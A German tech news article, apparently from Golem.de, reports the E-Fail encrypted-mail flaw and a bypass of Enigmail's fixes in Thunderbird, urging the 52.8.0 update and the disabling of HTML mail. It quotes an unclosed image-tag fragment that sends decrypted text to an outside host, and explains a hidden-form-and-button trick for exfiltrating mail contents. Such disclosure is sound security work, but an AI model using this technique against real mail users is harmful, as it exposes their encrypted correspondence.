• IT-Karriere:
  • Services:

PGP/SMIME: Thunderbird-Update notwendig, um E-Fail zu verhindern

Thunderbird war bis Freitag für die E-Fail-Sicherheitslücke verwundbar, für Apple Mail gibt es bislang überhaupt kein Update. Vorläufig ist es empfehlenswert, HTML-Mails komplett zu deaktivieren.

Eine Exklusivmeldung von Hanno Böck veröffentlicht am
Efail konnte man auch nach einem Update von Enigmail noch ausnutzen.
Efail konnte man auch nach einem Update von Enigmail noch ausnutzen. (Bild: efail/CC0 1.0)

Nutzer des Thunderbird-Mailprogramms, die Mailverschlüsselung benutzen, sollten dringend das Update auf Version 52.8.0 installieren. Neben weiteren Sicherheitslücken werden darin verschiedene Bugs behoben, die es Angreifern ermöglichen, verschlüsselte Nachrichten zu exfiltrieren. Nach wie vor kein Update gibt es für Apple Mail, das ähnlich wie Thunderbird von der gravierendsten Variante der E-Fail-Sicherheitslücke betroffen ist.

Stellenmarkt
  1. über duerenhoff GmbH, Augsburg
  2. Deutsche Rentenversicherung Bund, Berlin

Am Montag hatten Sicherheitsforscher zahlreiche Sicherheitsprobleme bei verschlüsselten Mails publiziert. Ein Entwickler von Enigmail hatte zwischenzeitlich behauptet, dass es überhaupt keinen Grund zur Sorge gäbe: Wer die aktuelle Version installiert habe, sei sicher. Doch das stimmte nicht. Zwar hatte Enigmail Gegenmaßnahmen implementiert, die waren jedoch relativ leicht zu umgehen.

Direct Exfiltration nutzt mehrere Mailparts

Die gravierendste Variante der E-Fail-Lücke ist die sogenannte Direct Exfiltration. Dabei nutzt ein Angreifer die Tatsache aus, dass HTML-Mails mit mehreren Teilen im Mailprogramm gemeinsam gerendert werden. In der simpelsten Variante kann ein Angreifer somit etwa ein Bild von seinem eigenen Server laden und dabei den HTML-Tag nicht schließen (etwa <img src="https://efail.de/x=). Anschließend fügt er den verschlüsselten Mailinhalt ein. Dieser wird dann direkt als Parameter angehängt.

Diese Variante funktioniert aber nur, wenn das Nachladen von Inhalten bei HTML-Mails aktiviert ist. Bei Thunderbird ist es das in der Standardeinstellung nicht. Weiterhin hatten die Entwickler von Enigmail zwischen den Mailparts Anführungszeichen eingefügt. Damit wurde das Anhängen als Parameter unterbrochen.

Mit Formularen lassen sich Gegenmaßnahmen von Enigmail austricksen

Gemeinsam mit Jens Müller, einem der Co-Autoren des E-Fail-Papers, gelang es dem Autor dieses Artikels jedoch, trotz dieser beiden Hürden Mailinhalte zu exfiltrieren. Statt dem Nachladen eines Bildes kann man auch ein Formular verwenden. In dieses Formular fügt man eine Textarea ein. Der Vorteil: Bei einem <textarea>-Tag wird der Inhalt nicht von Anführungszeichen eingeschlossen, sondern von HTML-Tags.

Thunderbird versuchte bereits bisher, das Abschicken eines Formulars in einer HTML-Mail zu verhindern. Bei einem Klick auf einen normalen HTML-Submit-Button (<input type="submit">) wird zwar die Ziel-URL geladen, es werden jedoch keine Daten übertragen. Doch diese Schutzmaßnahme von Thunderbird war unvollständig: Neben dem <input>-Tag kann man einen Formularbutton auch mit dem <button>-Element einfügen. Und da griff die Schutzmaßnahme bislang nicht.

Somit kann ein Angreifer Folgendes machen: Er erzeugt eine Mail, die ein Formular enthält. Im Formular gibt es ein Textarea-Feld, das den verschlüsselten Teil, der exfiltriert werden soll, einschließt. Weiterhin fügt der Angreifer mit dem <button>-Element einen Button ein.

Um das Ganze möglichst unauffällig zu machen, kann man das Textarea-Feld und den Button mittels CSS unsichtbar machen. Weiterhin kann man den Button über die gesamte Mail legen. Das hat zur Folge, dass ein beliebiger Mausklick irgendwo in der dargestellten Mail dazu führt, dass die Daten an den Angreifer geschickt werden.

In der jetzt veröffentlichten Thunderbird-Version ist das Abschicken von Formularen mittels des <button>-Tags nicht mehr möglich. Damit wird der Angriff in dieser Form verhindert.

Weitere Lücken denkbar

Nach wie vor stellt Thunderbird mehrere Mailteile in einem HTML-Kontext dar. Das soll erst in einer kommenden Version behoben werden. Daher ist es gut möglich, dass weitere Tricks gefunden werden, mit denen man Mailinhalte exfiltrieren kann. Es empfielt sich daher, die Darstellung von HTML-Mails generell abzuschalten.

Apple Mail ist laut Aussage der E-Fail-Entdecker weiterhin vollständig für die Direct-Exfiltration-Lücke verwundbar. Wir haben Apple um eine Stellungnahme gebeten, bisher aber keine Antwort erhalten.

Nach der Veröffentlichung von E-Fail kam es zu heftigen Diskussionen über die Art der Veröffentlichung und insbesondere über die Warnungen der Electronic Frontier Foundation. Ein entscheidender Aspekt wurde dabei bislang wenig beachtet: Trotz monatelanger Vorwarnzeit waren wichtige Softwareprojekte nicht in der Lage, rechtzeitig Sicherheitsupdates bereitzustellen.

Bitte aktivieren Sie Javascript.
Oder nutzen Sie das Golem-pur-Angebot
und lesen Golem.de
  • ohne Werbung
  • mit ausgeschaltetem Javascript
  • mit RSS-Volltext-Feed


Anzeige
Spiele-Angebote
  1. 9,99€
  2. 19,99€
  3. 19,99€ (PS4), 34,84€ (Xbox One), 49,99€ (Steam-Code)
  4. (-63%) 6,99€

navtis 22. Mai 2018

Ist es, wenn man feststellt, dass die mail nicht signiert war, nicht längst zu spät?

Sharra 22. Mai 2018

Auch in "deiner Welt" kann man updates automatisieren... Was hier und da auch durchaus...

throgh 20. Mai 2018

Und? Wie lange hat es jetzt gedauert bis erste Korrekturen vorgelegen haben? Ja, Open...


Folgen Sie uns
       


Wo bleiben die E-Flugzeuge? (Interview mit Rolf Henke vom DLR)

Wir haben den Bereichsvorstand Luftfahrt beim DLR gefragt, was Alternativen zum herkömmlichen Flugzeug so kompliziert macht.

Wo bleiben die E-Flugzeuge? (Interview mit Rolf Henke vom DLR) Video aufrufen
Coronakrise: IT-Freelancer müssen als Erste gehen
Coronakrise
IT-Freelancer müssen als Erste gehen

Die Pandemie schlägt bei vielen IT-Freiberuflern schneller zu als bei Festangestellten. Schon die Hälfte aller Projekte sind gecancelt. Überraschung: Bei der anderen Hälfte läuft es weiter wie bisher. Wie das?
Ein Bericht von Peter Ilg

  1. Coronavirus Media Markt und Saturn stoppen Mietzahlungen
  2. Corona Besitzer von Media Markt Saturn beantragt Staatshilfe
  3. Coronakrise EU wertet Kontaktsperren mit Mobilfunkdaten aus

Starsky Robotics: Woran ein Startup für autonome Lkw gescheitert ist
Starsky Robotics
Woran ein Startup für autonome Lkw gescheitert ist

Der Gründer eines Startups für selbstfahrende Lkw hält die Technik noch lange nicht für praxistauglich.
Ein Bericht von Friedhelm Greis

  1. R2 von Nuro Autonomer Lieferwagen darf ohne Windschutzscheibe fahren
  2. DLR Testfeld für autonomes Fahren analysiert den Autoverkehr
  3. Snapdragon Ride Qualcomm entwickelt Plattform für autonomes Fahren

Half-Life Alyx im Test: Der erste und vielleicht letzte VR-Blockbuster
Half-Life Alyx im Test
Der erste und vielleicht letzte VR-Blockbuster

Im zweiten Half-Life war sie eine Nebenfigur, nun ist sie die Heldin: Valve schickt Spieler als Alyx ins virtuelle City 17 - toll gemacht, aber wohl ein Verkaufsflop.
Von Peter Steinlechner

  1. Actionspiel Valve rechnet mit Nicht-VR-Mod von Half-Life Alyx
  2. Half-Life Alyx angespielt Sprung für Sprung durch City 17
  3. Valve Durch Half-Life Alyx geht's laufend oder per Teleport

    •  /